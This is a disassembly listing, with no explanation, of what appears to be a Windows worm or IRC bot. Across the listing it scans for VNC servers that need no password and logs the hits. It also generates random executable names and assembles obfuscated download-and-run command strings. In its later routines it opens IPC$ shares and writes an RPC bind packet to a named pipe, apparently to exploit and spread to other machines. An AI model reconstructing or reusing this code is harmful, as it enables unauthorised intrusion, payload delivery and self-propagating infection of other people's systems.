push edi
call sub_407FB9
add esp, 1Ch
test eax, eax
jz short loc_408C3E
lea eax, [esp+3Ch+arg_28]
push 4
push eax
push edi
call sub_407F80
add esp, 0Ch
test eax, eax
jz short loc_408C3E
mov ecx, [esp+3Ch+arg_28]
mov eax, ecx
mov edx, ecx
and eax, 0FF0000h
shr edx, 10h
or eax, edx
mov edx, ecx
shl edx, 10h
and ecx, 0FF00h
or edx, ecx
shr eax, 8
shl edx, 8
or eax, edx
mov [esp+3Ch+arg_28], eax
sub eax, ebx
jz loc_4091F9
mov edi, dword_43718C
dec eax
mov ebp, 3E8h
mov ebx, offset byte_4556A8
mov esi, offset aVxppy0owq7d ; "VxPpy0owQ7D/"
jz short loc_408D14
dec eax
jz loc_40911E
xor esi, esi
inc esi
loc_408D03: ; CODE XREF: sub_408B6A+D6�j
push [esp+3Ch+var_2C]
call dword_4372D4 ; closesocket
mov eax, esi
jmp loc_4091FB
; ---------------------------------------------------------------------------
loc_408D14: ; CODE XREF: sub_408B6A+18D�j
push 1
push offset word_454018
push [esp+44h+var_2C]
call sub_407FB9
add esp, 0Ch
test eax, eax
jz loc_40911E
lea eax, [esp+3Ch+arg_10]
push 18h
push eax
push [esp+44h+var_2C]
call sub_407F80
add esp, 0Ch
test eax, eax
jz loc_40911E
mov eax, [esp+3Ch+arg_10]
xor edx, edx
mov dl, byte ptr [esp+3Ch+arg_10+1]
mov ecx, 0FFh
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+3Ch+arg_10+2]
mov word ptr [esp+3Ch+arg_10], dx
xor edx, edx
mov dl, byte ptr [esp+3Ch+arg_10+3]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+3Ch+arg_18]
mov word ptr [esp+3Ch+arg_10+2], dx
xor edx, edx
mov dl, byte ptr [esp+3Ch+arg_18+1]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+3Ch+arg_18+2]
mov word ptr [esp+3Ch+arg_18], dx
xor edx, edx
mov dl, byte ptr [esp+3Ch+arg_18+3]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+3Ch+arg_1C]
mov word ptr [esp+3Ch+arg_18+2], dx
xor edx, edx
mov dl, byte ptr [esp+3Ch+arg_1C+1]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+3Ch+arg_24]
mov word ptr [esp+3Ch+arg_1C], dx
mov ecx, eax
mov edx, eax
and ecx, 0FF0000h
shr edx, 10h
or ecx, edx
mov edx, eax
shl edx, 10h
and eax, 0FF00h
or edx, eax
lea eax, [esp+3Ch+arg_2878]
push eax
lea eax, [esp+40h+arg_15C]
push [esp+40h+var_10]
shr ecx, 8
push [esp+44h+var_18]
shl edx, 8
push offset aVncD_DSNopass ; "VNC%d.%d: %s - (NoPass)"
or ecx, edx
push 2710h
push eax
mov [esp+54h+arg_24], ecx
call sub_429AEE
add esp, 18h
cmp [esp+3Ch+arg_2934], 0
jz short loc_408E4E
lea eax, [esp+3Ch+arg_15C]
push eax
push offset aS_5 ; "%s"
push [esp+44h+arg_2870]
push [esp+48h+arg_2874]
call sub_41CD84
add esp, 10h
loc_408E4E: ; CODE XREF: sub_408B6A+2BF�j
push 2710h
lea eax, [esp+40h+arg_15C]
push 0
push eax
call sub_429690
lea eax, [esp+48h+var_20]
push 1
push eax
push [esp+50h+var_2C]
call sub_407FFA
add esp, 18h
push ebp
call edi ; dword_43718C
lea eax, [esp+40h+var_20+2]
push 0
push eax
push [esp+48h+var_30]
call sub_407FFA
add esp, 0Ch
push ebp
call edi ; dword_43718C
lea eax, [esp+44h+var_28]
push 2
push eax
push [esp+4Ch+var_34]
call sub_407FFA
add esp, 0Ch
push ebp
call edi ; dword_43718C
call sub_429ACC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 9
cdq
pop ecx
idiv ecx
lea eax, [esp+58h+arg_50]
push edx
push offset dword_44399C
push offset aSDDDDD_exe ; "%s%d%d%d%d%d.exe"
push eax
call sub_429A33
push 100h
push 0
push ebx
call sub_429690
add esp, 2Ch
cmp dword_456D88, 0
jnz loc_408FC2
lea eax, [esp+48h+arg_286C]
push eax
call sub_41E3FB
test eax, eax
pop ecx
mov [esp+48h+var_34], offset dword_457CD8
jnz short loc_408F36
mov [esp+48h+var_34], offset dword_457C20
loc_408F36: ; CODE XREF: sub_408B6A+3C2�j
lea eax, [esp+48h+arg_50]
push offset a2Afm0dt3o6_ ; "2/Afm0dt3o6."
push eax
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
lea eax, [esp+6Ch+arg_50]
push eax
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
call sub_401A77
push eax
call sub_401A77
push eax
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
push dword_454A10
push [esp+94h+var_34]
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset a7zfry0iusme1 ; "7Zfry0IUSmE1"
push offset aSSSSDSSSSSSSSS ; "%s %s %s %s %d >> %s %s %s %s %s >> %s "...
push 100h
push ebx
call sub_429AEE
add esp, 68h
jmp loc_40904E
; ---------------------------------------------------------------------------
loc_408FC2: ; CODE XREF: sub_408B6A+3A4�j
push offset a2Afm0dt3o6_ ; "2/Afm0dt3o6."
push offset dword_456B88
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
push offset dword_456B88
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
push offset aEih0f1gakfp0 ; "EiH0f1GakFP0"
push esi
call sub_401AF0
push eax
push offset dword_456988
push offset dword_456788
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
push dword_456780
push offset dword_456580
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset a7zfry0iusme1 ; "7Zfry0IUSmE1"
push offset aSSSSDSSSSSSS_0 ; "%s %s %s %s %d >> %s %s %s %s %s >> %s "...
push 100h
push ebx
call sub_429AEE
add esp, 74h
loc_40904E: ; CODE XREF: sub_408B6A+453�j
and [esp+48h+var_34], 0
push ebx
call sub_4292D0
test eax, eax
pop ecx
jbe short loc_4090A3
loc_40905E: ; CODE XREF: sub_408B6A+537�j
mov eax, [esp+48h+var_34]
movsx eax, byte_4556A8[eax]
push eax
push offset dword_43EE88
lea eax, [esp+50h+var_20]
push 3
push eax
call sub_429AEE
lea eax, [esp+58h+var_20]
push 0
push eax
push [esp+60h+var_38]
call sub_407FFA
add esp, 1Ch
push 0Fh
call edi ; dword_43718C
inc [esp+4Ch+var_38]
push ebx
call sub_4292D0
cmp [esp+50h+var_38], eax
pop ecx
jb short loc_40905E
loc_4090A3: ; CODE XREF: sub_408B6A+4F2�j
push ebp
call edi ; dword_43718C
lea eax, [esp+50h+var_20]
push 0
push eax
push [esp+58h+var_40]
call sub_407FFA
add esp, 0Ch
push 7530h
call edi ; dword_43718C
lea eax, [esp+54h+var_3C]
push 1
push eax
push [esp+5Ch+var_44]
call sub_407FFA
add esp, 0Ch
push ebp
call edi ; dword_43718C
lea eax, [esp+58h+var_38]
push 0
push eax
push [esp+60h+var_48]
call sub_407FFA
add esp, 0Ch
push ebp
call edi ; dword_43718C
lea eax, [esp+5Ch+var_44]
push 2
push eax
push [esp+64h+var_4C]
call sub_407FFA
add esp, 0Ch
push ebp
call edi ; dword_43718C
mov eax, [esp+60h+arg_2900]
mov dword_4556A0, 1
shl eax, 6
lea eax, dword_43A380[eax]
inc dword ptr [eax]
loc_40911E: ; CODE XREF: sub_408B6A+190�j
; sub_408B6A+1BF�j ...
lea eax, [esp+60h+arg_28]
push 10h
push eax
push [esp+68h+var_50]
call sub_407F80
add esp, 0Ch
test eax, eax
jnz short loc_409142
push [esp+60h+var_50]
call dword_4372D4 ; closesocket
loc_409142: ; CODE XREF: sub_408B6A+5CC�j
push [esp+64h+arg_2914]
call sub_4292D0
cmp eax, 8
pop ecx
jbe short loc_40915F
mov eax, [esp+64h+arg_2914]
and byte ptr [eax+8], 0
loc_40915F: ; CODE XREF: sub_408B6A+5E8�j
push [esp+64h+arg_2914]
lea eax, [esp+68h+arg_24]
push eax
call sub_407F26
lea eax, [esp+6Ch+arg_24]
push 10h
push eax
push [esp+74h+var_54]
call sub_407FB9
add esp, 14h
test eax, eax
jnz short loc_409197
push [esp+64h+var_54]
call dword_4372D4 ; closesocket
loc_409197: ; CODE XREF: sub_408B6A+621�j
lea eax, [esp+68h+var_34]
push 4
push eax
push [esp+70h+var_58]
call sub_407F80
add esp, 0Ch
test eax, eax
jnz short loc_4091B8
push [esp+68h+var_58]
call dword_4372D4 ; closesocket
loc_4091B8: ; CODE XREF: sub_408B6A+642�j
mov ecx, [esp+6Ch+var_38]
mov eax, ecx
mov edx, ecx
and eax, 0FF0000h
shr edx, 10h
or eax, edx
mov edx, ecx
shl edx, 10h
and ecx, 0FF00h
or edx, ecx
shr eax, 8
shl edx, 8
or eax, edx
mov [esp+6Ch+var_38], eax
sub eax, 0
jz short loc_409206
dec eax
jz short loc_4091F9
dec eax
jnz loc_408C3E
push 3E80h
call edi ; dword_43718C
loc_4091F9: ; CODE XREF: sub_408B6A+5E�j
; sub_408B6A+BA�j ...
xor eax, eax
loc_4091FB: ; CODE XREF: sub_408B6A+1A5�j
; sub_408B6A+AA7�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 289Ch
retn
; ---------------------------------------------------------------------------
loc_409206: ; CODE XREF: sub_408B6A+67C�j
push 1
push offset word_454018
push [esp+74h+var_5C]
call sub_407FB9
add esp, 0Ch
test eax, eax
jz loc_409603
lea eax, [esp+6Ch+var_34]
push 18h
push eax
push [esp+74h+var_5C]
call sub_407F80
add esp, 0Ch
test eax, eax
jz loc_409603
mov eax, [esp+6Ch+var_34]
xor edx, edx
mov dl, byte ptr [esp+6Ch+var_34+1]
mov ecx, 0FFh
shl eax, 8
xor dl, al
push [esp+6Ch+arg_290C]
and dx, cx
xor edx, eax
mov eax, [esp+70h+var_34+2]
mov word ptr [esp+70h+var_34], dx
xor edx, edx
mov dl, byte ptr [esp+70h+var_34+3]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+70h+var_2C]
mov word ptr [esp+70h+var_34+2], dx
xor edx, edx
mov dl, byte ptr [esp+70h+var_2C+1]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+70h+var_2C+2]
mov word ptr [esp+70h+var_2C], dx
xor edx, edx
mov dl, byte ptr [esp+70h+var_2C+3]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+70h+var_28]
mov word ptr [esp+70h+var_2C+2], dx
xor edx, edx
mov dl, byte ptr [esp+70h+var_28+1]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+70h+var_20]
mov word ptr [esp+70h+var_28], dx
mov ecx, eax
mov edx, eax
and ecx, 0FF0000h
shr edx, 10h
or ecx, edx
mov edx, eax
shl edx, 10h
and eax, 0FF00h
or edx, eax
lea eax, [esp+70h+arg_2848]
push eax
lea eax, [esp+74h+arg_12C]
push [esp+74h+var_40]
shr ecx, 8
push [esp+78h+var_48]
shl edx, 8
push offset aVncD_DSS ; "VNC%d.%d: %s - %s"
or ecx, edx
push 2710h
push eax
mov [esp+88h+var_20], ecx
call sub_429AEE
add esp, 1Ch
cmp [esp+6Ch+arg_2904], 0
jz short loc_409347
lea eax, [esp+6Ch+arg_12C]
push eax
push offset aS_5 ; "%s"
push [esp+74h+arg_2840]
push [esp+78h+arg_2844]
call sub_41CD84
add esp, 10h
loc_409347: ; CODE XREF: sub_408B6A+7B8�j
push 2710h
lea eax, [esp+70h+arg_12C]
push 0
push eax
call sub_429690
lea eax, [esp+78h+var_50]
push 1
push eax
push [esp+80h+var_5C]
call sub_407FFA
add esp, 18h
push ebp
call edi ; dword_43718C
lea eax, [esp+70h+var_50+2]
push 0
push eax
push [esp+78h+var_60]
call sub_407FFA
add esp, 0Ch
push ebp
call edi ; dword_43718C
lea eax, [esp+74h+var_58]
push 2
push eax
push [esp+7Ch+var_64]
call sub_407FFA
add esp, 0Ch
push ebp
call edi ; dword_43718C
call sub_429ACC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429ACC
push 9
cdq
pop ecx
idiv ecx
lea eax, [esp+88h+arg_20]
push edx
push offset dword_44399C
push offset aSDDDDD_exe ; "%s%d%d%d%d%d.exe"
push eax
call sub_429A33
push 100h
push 0
push ebx
call sub_429690
add esp, 2Ch
cmp dword_456D88, 0
jnz loc_4094BB
lea eax, [esp+78h+arg_283C]
push eax
call sub_41E3FB
test eax, eax
pop ecx
mov [esp+78h+var_64], offset dword_457CD8
jnz short loc_40942F
mov [esp+78h+var_64], offset dword_457C20
loc_40942F: ; CODE XREF: sub_408B6A+8BB�j
lea eax, [esp+78h+arg_20]
push offset a2Afm0dt3o6_ ; "2/Afm0dt3o6."
push eax
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
lea eax, [esp+9Ch+arg_20]
push eax
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
call sub_401A77
push eax
call sub_401A77
push eax
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
push dword_454A10
push [esp+0C4h+var_64]
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset a7zfry0iusme1 ; "7Zfry0IUSmE1"
push offset aSSSSDSSSSSSSSS ; "%s %s %s %s %d >> %s %s %s %s %s >> %s "...
push 100h
push ebx
call sub_429AEE
add esp, 68h
jmp loc_409547
; ---------------------------------------------------------------------------
loc_4094BB: ; CODE XREF: sub_408B6A+89D�j
push offset a2Afm0dt3o6_ ; "2/Afm0dt3o6."
push offset dword_456B88
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
push offset dword_456B88
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
push offset aEih0f1gakfp0 ; "EiH0f1GakFP0"
push esi
call sub_401AF0
push eax
push offset dword_456988
push offset dword_456788
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
push dword_456780
push offset dword_456580
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset a7zfry0iusme1 ; "7Zfry0IUSmE1"
push offset aSSSSDSSSSSSS_0 ; "%s %s %s %s %d >> %s %s %s %s %s >> %s "...
push 100h
push ebx
call sub_429AEE
add esp, 74h
loc_409547: ; CODE XREF: sub_408B6A+94C�j
push ebx
xor esi, esi
call sub_4292D0
test eax, eax
pop ecx
jbe short loc_409590
loc_409554: ; CODE XREF: sub_408B6A+A24�j
movsx eax, byte_4556A8[esi]
push eax
push offset dword_43EE88
lea eax, [esp+80h+var_50]
push 3
push eax
call sub_429AEE
lea eax, [esp+88h+var_50]
push 0
push eax
push [esp+90h+var_68]
call sub_407FFA
add esp, 1Ch
push 0Fh
call edi ; dword_43718C
push ebx
inc esi
call sub_4292D0
cmp esi, eax
pop ecx
jb short loc_409554
loc_409590: ; CODE XREF: sub_408B6A+9E8�j
push ebp
call edi ; dword_43718C
mov esi, [esp+80h+var_70]
lea eax, [esp+80h+var_50]
push 0
push eax
push esi
call sub_407FFA
add esp, 0Ch
push 7530h
call edi ; dword_43718C
xor ebx, ebx
lea eax, [esp+84h+var_6C]
inc ebx
push ebx
push eax
push esi
call sub_407FFA
add esp, 0Ch
push ebp
call edi ; dword_43718C
lea eax, [esp+88h+var_68]
push 0
push eax
push esi
call sub_407FFA
add esp, 0Ch
push ebp
call edi ; dword_43718C
lea eax, [esp+8Ch+var_74]
push 2
push eax
push esi
call sub_407FFA
add esp, 0Ch
push ebp
call edi ; dword_43718C
mov eax, [esp+90h+arg_28D0]
mov dword_4556A0, ebx
shl eax, 6
lea eax, dword_43A380[eax]
inc dword ptr [eax]
jmp short loc_409607
; ---------------------------------------------------------------------------
loc_409603: ; CODE XREF: sub_408B6A+6B1�j
; sub_408B6A+6CC�j
mov esi, [esp+6Ch+var_5C]
loc_409607: ; CODE XREF: sub_408B6A+A97�j
push esi
call dword_4372D4 ; closesocket
xor eax, eax
inc eax
jmp loc_4091FB
sub_408B6A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
cmp off_43EDE8, 0
push ebx
push esi
push edi
jz short loc_409673
mov ebx, offset off_43EDE8
loc_409627: ; CODE XREF: .text:00409671�j
cmp dword_4556A0, 0
jnz short loc_409673
push dword ptr [ebx]
lea esi, [esp+1Ch]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
push dword ptr [esp+0DCh]
rep movsd
push dword ptr [esp+0DCh]
call sub_408B6A
add esp, 0D0h
test eax, eax
jnz short loc_40966B
push 3E80h
call dword_43718C ; Sleep
loc_40966B: ; CODE XREF: .text:0040965E�j
add ebx, 4
cmp dword ptr [ebx], 0
jnz short loc_409627
loc_409673: ; CODE XREF: .text:00409620�j
; .text:0040962E�j
xor eax, eax
pop edi
pop esi
inc eax
pop ebx
retn
; =============== S U B R O U T I N E =======================================
sub_40967A proc near ; CODE XREF: sub_40978A+EE�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
xor edx, edx
cmp [esp+arg_4], edx
jbe short locret_4096AA
push esi
mov esi, [esp+4+arg_8]
loc_409687: ; CODE XREF: sub_40967A+2D�j
mov eax, [esp+4+arg_0]
mov cl, [edx+eax]
mov al, cl
and cl, 0Fh
shr al, 4
add cl, 41h
add al, 41h
mov [esi+edx*2], cl
mov [esi+edx*2+1], al
inc edx
cmp edx, [esp+4+arg_4]
jb short loc_409687
pop esi
locret_4096AA: ; CODE XREF: sub_40967A+6�j
retn
sub_40967A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4096AB proc near ; CODE XREF: sub_4096AB+CD�p
; sub_40978A+493�p
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_7 = byte ptr 0Fh
arg_C = word ptr 14h
arg_14 = dword ptr 1Ch
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_4096BF
or [ebp+arg_7], 1
jmp short loc_4096C3
; ---------------------------------------------------------------------------
loc_4096BF: ; CODE XREF: sub_4096AB+C�j
and [ebp+arg_7], 0FEh
loc_4096C3: ; CODE XREF: sub_4096AB+12�j
mov ebx, [ebp+arg_20]
mov eax, [ebp+arg_24]
lea ecx, [ebx+18h]
cmp ecx, eax
ja short loc_4096E4
or [ebp+arg_7], 2
and byte ptr [ebp+arg_28+3], 0
lea eax, [ebx+18h]
mov [ebp+arg_14], ebx
mov [ebp+arg_C], ax
jmp short loc_4096F6
; ---------------------------------------------------------------------------
loc_4096E4: ; CODE XREF: sub_4096AB+23�j
mov [ebp+arg_C], ax
add eax, 0FFFFFFE8h
and [ebp+arg_7], 0FDh
mov [ebp+arg_14], eax
mov byte ptr [ebp+arg_28+3], 1
loc_4096F6: ; CODE XREF: sub_4096AB+37�j
movzx eax, [ebp+arg_C]
push eax
mov [ebp+var_4], eax
call sub_4296E8
test eax, eax
pop ecx
mov [ebp+arg_20], eax
jnz short loc_40970F
loc_40970B: ; CODE XREF: sub_4096AB+A4�j
xor eax, eax
jmp short loc_409785
; ---------------------------------------------------------------------------
loc_40970F: ; CODE XREF: sub_4096AB+5E�j
push 6
lea esi, [ebp+arg_4]
pop ecx
mov edi, eax
rep movsd
mov edi, [ebp+arg_14]
mov esi, [ebp+arg_1C]
push edi
add eax, 18h
push esi
push eax
call sub_429350
add esp, 0Ch
lea eax, [ebp+var_8]
push 0
push eax
push [ebp+var_4]
push [ebp+arg_20]
push [ebp+arg_0]
call dword_437078 ; WriteFile
push [ebp+arg_20]
test eax, eax
jnz short loc_409751
call sub_429822
pop ecx
jmp short loc_40970B
; ---------------------------------------------------------------------------
loc_409751: ; CODE XREF: sub_4096AB+9C�j
call sub_429822
cmp byte ptr [ebp+arg_28+3], 0
pop ecx
jz short loc_409782
push 0
sub ebx, edi
push [ebp+arg_24]
add edi, esi
lea esi, [ebp+arg_4]
push ebx
push edi
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0]
rep movsd
call sub_4096AB
add esp, 2Ch
jmp short loc_409785
; ---------------------------------------------------------------------------
loc_409782: ; CODE XREF: sub_4096AB+B0�j
xor eax, eax
inc eax
loc_409785: ; CODE XREF: sub_4096AB+62�j
; sub_4096AB+D5�j
pop edi
pop esi
pop ebx
leave
retn
sub_4096AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40978A proc near ; CODE XREF: .text:00409D60�p
; .text:00409D85�p ...
var_CC48 = byte ptr -0CC48h
var_8C48 = byte ptr -8C48h
var_6C48 = byte ptr -6C48h
var_4C48 = byte ptr -4C48h
var_2C48 = word ptr -2C48h
var_10F0 = dword ptr -10F0h
var_7F4 = byte ptr -7F4h
var_7EF = byte ptr -7EFh
var_7B0 = byte ptr -7B0h
var_344 = byte ptr -344h
var_90 = byte ptr -90h
var_7C = dword ptr -7Ch
var_70 = byte ptr -70h
var_6C = byte ptr -6Ch
var_6B = byte ptr -6Bh
var_6A = byte ptr -6Ah
var_69 = byte ptr -69h
var_68 = dword ptr -68h
var_64 = word ptr -64h
var_62 = word ptr -62h
var_60 = dword ptr -60h
var_5C = word ptr -5Ch
var_5A = word ptr -5Ah
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = word ptr -50h
var_4E = byte ptr -4Eh
var_4C = byte ptr -4Ch
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = dword ptr -20h
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_B0 = dword ptr 0B8h
arg_B8 = dword ptr 0C0h
arg_C0 = dword ptr 0C8h
arg_C8 = dword ptr 0D0h
arg_CC = dword ptr 0D4h
push ebp
mov ebp, esp
mov eax, 0CC48h
call sub_429A90
push ebx
push esi
push edi
lea eax, [ebp+arg_4]
push 1
push eax
call sub_4044F6
pop ecx
cmp eax, 3
pop ecx
mov [ebp+var_4], eax
jz short loc_4097C8
lea eax, [ebp+arg_4]
push 5
push eax
call sub_4044F6
pop ecx
cmp eax, 3
pop ecx
mov [ebp+var_4], eax
jnz loc_409C46
loc_4097C8: ; CODE XREF: sub_40978A+23�j
mov eax, dword_43EFB0
xor ebx, ebx
cmp eax, ebx
mov [ebp+var_C], eax
jz loc_409C46
push 2B1h
lea eax, [ebp+var_344]
push ebx
push eax
call sub_429690
mov esi, 0DACh
lea eax, [ebp+var_10F0]
push esi
push ebx
push eax
call sub_429690
push 1B58h
lea eax, [ebp+var_2C48]
push ebx
push eax
call sub_429690
push 0DABh
lea eax, [ebp+var_10F0]
push 41h
push eax
call sub_429690
mov edi, [ebp+arg_0]
push 5
push offset dword_43EFB4
lea edi, [edi+edi*2]
shl edi, 2
mov eax, dword ptr (loc_43F012+2)[edi]
mov ecx, dword ptr (loc_43F00F+1)[edi]
mov [ebp+eax+var_10F0], ecx
lea eax, [ebp+var_7F4]
push eax
call sub_429350
push 3Fh
lea eax, [ebp+var_7EF]
push offset sub_43EFD0
push eax
call sub_429350
add esp, 48h
lea eax, [ebp+var_344]
push eax
push [ebp+var_C]
push offset dword_43A8E8
call sub_40967A
lea eax, [ebp+var_344]
push eax
call sub_4292D0
push eax
lea eax, [ebp+var_344]
push eax
lea eax, [ebp+var_7B0]
push eax
call sub_429350
lea eax, [ebp+var_344]
push eax
call sub_4292D0
add esp, 20h
cmp [ebp+var_4], 3
mov [ebp+eax+var_7B0], bl
jnz short loc_4098D1
xor eax, eax
loc_4098BB: ; CODE XREF: sub_40978A+145�j
movzx cx, byte ptr [ebp+eax+var_10F0]
mov [ebp+eax*2+var_2C48], cx
inc eax
cmp eax, esi
jb short loc_4098BB
loc_4098D1: ; CODE XREF: sub_40978A+12D�j
lea eax, [ebp+arg_4]
mov esi, 2000h
push eax
push offset aS_0 ; "\\\\%s"
lea eax, [ebp+var_6C48]
push esi
push eax
call sub_429AEE
lea eax, [ebp+var_6C48]
push esi
push eax
lea eax, [ebp+var_CC48]
push eax
call sub_42A954
lea eax, [ebp+arg_4]
push offset dword_43AB8C
push eax
call sub_42A7F0
add esp, 24h
test eax, eax
jz short loc_40996D
lea eax, [ebp+arg_4]
push eax
push offset dword_43CB4C
lea eax, [ebp+var_8C48]
push esi
push eax
call sub_429AEE
push esi
lea eax, [ebp+var_8C48]
push offset aIpc ; "IPC$"
push eax
call sub_429910
push 20h
lea eax, [ebp+var_90]
push ebx
push eax
call sub_429690
lea eax, [ebp+var_8C48]
add esp, 28h
mov [ebp+var_7C], eax
mov eax, offset byte_454A34
push ebx
push eax
push eax
lea eax, [ebp+var_90]
push eax
call dword_456FE0
loc_40996D: ; CODE XREF: sub_40978A+189�j
lea eax, [ebp+arg_4]
push eax
push offset dword_43CB4C
lea eax, [ebp+var_4C48]
push esi
push eax
call sub_429AEE
push esi
lea eax, [ebp+var_4C48]
push offset dword_43F078
push eax
call sub_429910
add esp, 1Ch
lea eax, [ebp+var_4C48]
push ebx
push ebx
push 3
push ebx
push 3
push 40000000h
push eax
call dword_43705C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_409C3B
push 48h
lea eax, [ebp+var_6C]
push ebx
push eax
call sub_429690
xor eax, eax
push 10h
inc eax
pop esi
mov [ebp+var_60], eax
mov [ebp+var_54], eax
mov [ebp+var_4E], al
mov [ebp+var_3C], eax
push esi
lea eax, [ebp+var_4C]
push offset dword_43F064
push eax
mov [ebp+var_6C], 5
mov [ebp+var_6B], bl
mov [ebp+var_6A], 0Bh
mov [ebp+var_69], 3
mov [ebp+var_68], esi
mov [ebp+var_64], 48h
mov [ebp+var_62], bx
mov [ebp+var_5C], 10B8h
mov [ebp+var_5A], 10B8h
mov [ebp+var_58], ebx
mov [ebp+var_50], bx
call sub_429350
push esi
lea eax, [ebp+var_38]
push offset dword_43E15C
push eax
mov [ebp+var_28], 2
call sub_429350
add esp, 24h
lea eax, [ebp+var_70]
push ebx
push eax
lea eax, [ebp+var_6C]
push 48h
push eax
push [ebp+var_4]
call dword_437078 ; WriteFile
test eax, eax
jnz short loc_409A58
loc_409A4A: ; CODE XREF: sub_40978A+339�j
push [ebp+var_4]
call dword_437044 ; CloseHandle
jmp loc_409C3B
; ---------------------------------------------------------------------------
loc_409A58: ; CODE XREF: sub_40978A+2BE�j
lea eax, [ebp+var_CC48]
push eax
call sub_42A937
lea eax, [eax+eax+12h]
pop ecx
test al, 3
mov [ebp+arg_0], eax
jz short loc_409A79
loc_409A70: ; CODE XREF: sub_40978A+2ED�j
inc [ebp+arg_0]
test byte ptr [ebp+arg_0], 3
jnz short loc_409A70
loc_409A79: ; CODE XREF: sub_40978A+2E4�j
cmp byte ptr (loc_43F017+1)[edi], bl
jz short loc_409A85
add [ebp+arg_0], 4
loc_409A85: ; CODE XREF: sub_40978A+2F5�j
lea eax, [ebp+var_2C48]
push eax
call sub_42A937
pop ecx
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax*2+0Eh]
jmp short loc_409A9C
; ---------------------------------------------------------------------------
loc_409A9B: ; CODE XREF: sub_40978A+314�j
inc eax
loc_409A9C: ; CODE XREF: sub_40978A+30F�j
test al, 3
jnz short loc_409A9B
add eax, 8
cmp byte ptr (loc_43F017+1)[edi], bl
jz short loc_409AB0
add eax, 4
jmp short loc_409AB2
; ---------------------------------------------------------------------------
